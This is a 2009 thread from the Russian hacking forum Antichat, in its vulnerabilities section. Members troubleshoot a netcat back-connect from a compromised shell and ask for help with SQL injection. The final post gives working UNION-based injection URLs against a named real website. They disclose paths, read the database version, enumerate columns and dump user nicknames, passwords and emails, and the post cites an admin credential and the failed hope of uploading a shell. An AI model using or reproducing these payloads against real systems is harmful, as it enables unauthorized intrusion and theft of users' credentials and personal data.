ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #10951  
Старый 25.12.2009, 03:41
Аватар для Nightmarе
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
По умолчанию

Цитата:
Сообщение от .:[melkiy]:.  
неткат у себя запустил?делай всё как в мануале, всё пашет(мб у тебя айпи динамический?)
Скорее NAT, а не динамик =))
 
Ответить с цитированием

  #10952  
Старый 25.12.2009, 03:42
Аватар для a1ertso
a1ertso
Новичок
Регистрация: 16.12.2009
Сообщений: 29
Провел на форуме:
101927

Репутация: 0
По умолчанию

Цитата:
Сообщение от .:[melkiy]:.  
неткат у себя запустил?делай всё как в мануале, всё пашет(мб у тебя айпи динамический?)
неткат тоже не реагирует висит...
 
Ответить с цитированием

  #10953  
Старый 25.12.2009, 03:43
Аватар для .:[melkiy]:.
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

Цитата:
Сообщение от Nightmarе  
Скорее NAT, а не динамик =))
перепутал =(

Цитата:
Сообщение от a1ertso  
неткат тоже не реагирует висит...
делай на дедик
 
Ответить с цитированием

  #10954  
Старый 25.12.2009, 03:47
Аватар для a1ertso
a1ertso
Новичок
Регистрация: 16.12.2009
Сообщений: 29
Провел на форуме:
101927

Репутация: 0
По умолчанию

Цитата:
Сообщение от .:[melkiy]:.  
делай на дедик
Всмысле через промежуточный хост?
 
Ответить с цитированием

  #10955  
Старый 25.12.2009, 03:52
Аватар для .:[melkiy]:.
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

Цитата:
Сообщение от a1ertso  
Всмысле через промежуточный хост?
команды на шелле пашут хоть?)
 
Ответить с цитированием

  #10956  
Старый 25.12.2009, 03:53
Аватар для a1ertso
a1ertso
Новичок
Регистрация: 16.12.2009
Сообщений: 29
Провел на форуме:
101927

Репутация: 0
По умолчанию

Цитата:
Сообщение от .:[melkiy]:.  
команды на шелле пашут хоть?)
да)
 
Ответить с цитированием

  #10957  
Старый 25.12.2009, 23:23
Аватар для Nightmarе
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
По умолчанию

Столкнулся с такой ситуацией:
есть SQL с выводом, ветка 5, MySql пользователь рут, и главное нету волшебных ковычек, однако Load_file почему то не пашет...
Раскрытие путей нету вообще, помоему на сервере стоит запрет на вывод ошибок.
ещё есть таблица с юзверями, все поля подобрал, но как только пытаюсь вывести инфу, так ничего не выводится, хотя ясен пень, что она там есть, ибо админы и юзвери на сайте присутствуют, и при регистрации все данные так-же называются как и колонки в таблице.
пробовал всё, и unhex(hex()) и char и т.д....
Какие есть варианты? (к сожалению дать линк на SQL не могу)
 
Ответить с цитированием

  #10958  
Старый 26.12.2009, 00:09
Аватар для .:[melkiy]:.
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

Цитата:
Сообщение от Nightmarе  
Столкнулся с такой ситуацией:
есть SQL с выводом, ветка 5, MySql пользователь рут, и главное нету волшебных ковычек, однако Load_file почему то не пашет...
Раскрытие путей нету вообще, помоему на сервере стоит запрет на вывод ошибок.
ещё есть таблица с юзверями, все поля подобрал, но как только пытаюсь вывести инфу, так ничего не выводится, хотя ясен пень, что она там есть, ибо админы и юзвери на сайте присутствуют, и при регистрации все данные так-же называются как и колонки в таблице.
пробовал всё, и unhex(hex()) и char и т.д....
Какие есть варианты? (к сожалению дать линк на SQL не могу)
мб фейковая скуля?
 
Ответить с цитированием

  #10959  
Старый 26.12.2009, 10:31
Аватар для superboys
superboys
Познающий
Регистрация: 01.02.2008
Сообщений: 53
Провел на форуме:
136161

Репутация: 5
По умолчанию

http://logos.sakh.com/auth.php?name='&passw='
ваши идеи?
любой запрос игнорирует...
Мыслей нет.
 
Ответить с цитированием

  #10960  
Старый 26.12.2009, 12:34
Аватар для m0Hze
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214

Репутация: 3171


По умолчанию

Цитата:
Сообщение от superboys  
http://logos.sakh.com/auth.php?name='&passw='
ваши идеи?
любой запрос игнорирует...
Мыслей нет.
эмм..а что там не так? сайт ясно говорит - что логин\пассвор инкорект.Невижу уязвимости,хоть глаз выколи.
А вот если так,то уже кое что есть,раскрытия путей.
Код:
http://logos.sakh.com/auth.php?name[]=%27&passw[]=%27
А вот и скуля
Код:
http://logos.sakh.com/?view=comments%27+union+select+version%28%29,2,3+--+
Код:
http://logos.sakh.com/?view=comments%27+union+select+COLUMN_NAME,2,3+FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME=%27logos_users%27%20+limit+2,1+--+
Version: 5.0.82sp1-log
Админка: Z:jncjcb
Ничего интересного
Даже обидно(
Код:
http://logos.sakh.com/?view=comments%27+union+select+concat_ws%280x3a,nick,password,email%29,2,3+FROM%20logos_users+--+
Имей лимитом,если хочеш других пльзователей.привилегий на загрузку шела нет,а жаль.Хотя из админкиможно файлы править но там чтото недописано,и поэтому не получаеться)

Последний раз редактировалось m0Hze; 26.12.2009 в 13:14..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ